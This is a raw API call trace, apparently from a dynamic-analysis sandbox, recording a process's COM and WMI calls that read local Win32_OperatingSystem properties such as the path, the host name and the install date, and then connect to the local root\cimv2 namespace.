	[0220.972] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80d000*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cffc*=8, plFlavor=0x1c80cff8*=64 | out: pVal=0x1c80d000*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80cffc*=8, plFlavor=0x1c80cff8*=64) returned 0x0
	[0220.972] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0220.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d000 | out: puCount=0x1c80d000*=0x2) returned 0x0
	[0220.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d000*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d000*=0x17, pszText=0x0) returned 0x0
	[0220.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d000*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d000*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.972] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c80cff0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cfec*=0, plFlavor=0x1c80cfe8*=0 | out: pVal=0x1c80cff0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c80cfec*=8, plFlavor=0x1c80cfe8*=64) returned 0x0
	[0220.972] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.972] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c80d000*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cffc*=8, plFlavor=0x1c80cff8*=64 | out: pVal=0x1c80d000*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c80cffc*=8, plFlavor=0x1c80cff8*=64) returned 0x0
	[0220.972] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.973] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0220.973] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0220.973] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.973] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0220.973] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0220.973] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.973] IWbemClassObject:GetNames (in: This=0x1c83e8d0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c80cf88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c80cf80 | out: pNames=0x1c80cf80*="\x01ƀ\x08") returned 0x0
	[0220.973] SafeArrayGetDim (psa=0x1b814250) returned 0x1
	[0220.974] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__GENUS", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80cf7c*=3, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.974] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__CLASS", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.974] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.974] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.974] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__DYNASTY", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.974] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0220.975] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__RELPATH", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.975] SysStringLen (param_1="Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x28
	[0220.975] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3f, varVal2=0x0), pType=0x1c80cf7c*=3, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.975] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__DERIVATION", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b814250*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b830090, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c80cf7c*=8200, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.976] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__SERVER", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.976] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0220.976] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.976] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0220.976] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="__PATH", lFlags=0, pVal=0x1c80cf80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80cf7c*=0, plFlavor=0x1c80cf78*=0 | out: pVal=0x1c80cf80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80cf7c*=8, plFlavor=0x1c80cf78*=64) returned 0x0
	[0220.976] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x3f
	[0220.976] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d020 | out: puCount=0x1c80d020*=0x2) returned 0x0
	[0220.976] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d020*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d020*=0x17, pszText=0x0) returned 0x0
	[0220.976] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d020*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d020*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0220.976] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c80d00c*=101, plFlavor=0x1c80d008*=32) returned 0x0
	[0220.976] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0220.976] IWbemClassObject:Get (in: This=0x1c83e8d0, wszName="InstallDate", lFlags=0, pVal=0x1c80d240*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d23c*=101, plFlavor=0x1c80d238*=32 | out: pVal=0x1c80d240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="20171001131325.000000+600", varVal2=0x0), pType=0x1c80d23c*=101, plFlavor=0x1c80d238*=32) returned 0x0
	[0220.976] SysStringLen (param_1="20171001131325.000000+600") returned 0x19
	[0221.855] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0221.855] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0221.855] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0221.855] IUnknown:Release (This=0x181868) returned 0x1
	[0221.856] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c83e240) returned 0x0
	[0221.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c83e240, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0221.856] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c83e240, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c8380f0) returned 0x0
	[0221.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c8380f0) returned 0x0
	[0221.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0221.857] WbemDefPath:IUnknown:AddRef (This=0x1c8380f0) returned 0x3
	[0221.857] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0221.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b82c580) returned 0x0
	[0221.857] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82c580, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0221.857] WbemDefPath:IUnknown:Release (This=0x1b82c580) returned 0x3
	[0221.857] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0221.857] WbemDefPath:IUnknown:AddRef (This=0x1c8380f0) returned 0x4
	[0221.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x3
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x2
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c83e240) returned 0x0
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x1
	[0221.858] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0221.858] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0221.858] WbemDefPath:IUnknown:AddRef (This=0x1c8380f0) returned 0x2
	[0221.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c8380f0) returned 0x0
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x2
	[0221.858] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x1
	[0221.859] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0221.859] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0221.859] WbemDefPath:IUnknown:AddRef (This=0x1c8380f0) returned 0x2
	[0221.859] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8380f0, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c8380f0) returned 0x0
	[0221.859] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x2
	[0221.859] WbemDefPath:IUnknown:AddRef (This=0x1c8380f0) returned 0x3
	[0221.859] WbemDefPath:IWbemPath:SetText (This=0x1c8380f0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.859] WbemDefPath:IUnknown:Release (This=0x1c8380f0) returned 0x2
	[0221.859] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0221.859] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0221.859] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.859] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0221.859] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0221.859] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.859] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0221.860] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0221.860] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0221.860] IUnknown:Release (This=0x181868) returned 0x1
	[0221.860] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c83e2e0) returned 0x0
	[0221.860] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e2e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0221.860] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c83e2e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c83e300) returned 0x0
	[0221.860] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e300, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c83e300) returned 0x0
	[0221.861] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e300, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0221.861] WbemLocator:IUnknown:AddRef (This=0x1c83e300) returned 0x3
	[0221.861] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0221.861] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e300, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0221.861] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0221.861] WbemLocator:IUnknown:AddRef (This=0x1c83e300) returned 0x4
	[0221.861] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e300, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0221.861] WbemLocator:IUnknown:Release (This=0x1c83e300) returned 0x3
	[0221.862] WbemLocator:IUnknown:Release (This=0x1c83e300) returned 0x2
	[0221.862] WbemLocator:IUnknown:Release (This=0x1c83e2e0) returned 0x0
	[0221.862] WbemLocator:IUnknown:Release (This=0x1c83e300) returned 0x1
	[0221.862] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0221.862] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0221.862] WbemLocator:IUnknown:AddRef (This=0x1c83e300) returned 0x2
	[0221.862] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e300, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c83e300) returned 0x0
	[0221.862] WbemLocator:IUnknown:Release (This=0x1c83e300) returned 0x2
	[0221.862] WbemLocator:IUnknown:Release (This=0x1c83e300) returned 0x1
	[0221.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8380f0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0221.862] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0221.862] WbemDefPath:IWbemPath:GetText (in: This=0x1c8380f0, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0221.863] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c83e320) returned 0x0
	[0221.863] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c83e320, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c83b6a8) returned 0x0
	[0222.682] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b6a8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b8077f0) returned 0x0
	[0222.682] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b8077f0, pProxy=0x1c83b6a8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0222.682] WbemLocator:IUnknown:Release (This=0x1b8077f0) returned 0x1
	[0222.682] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b6a8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b807830) returned 0x0
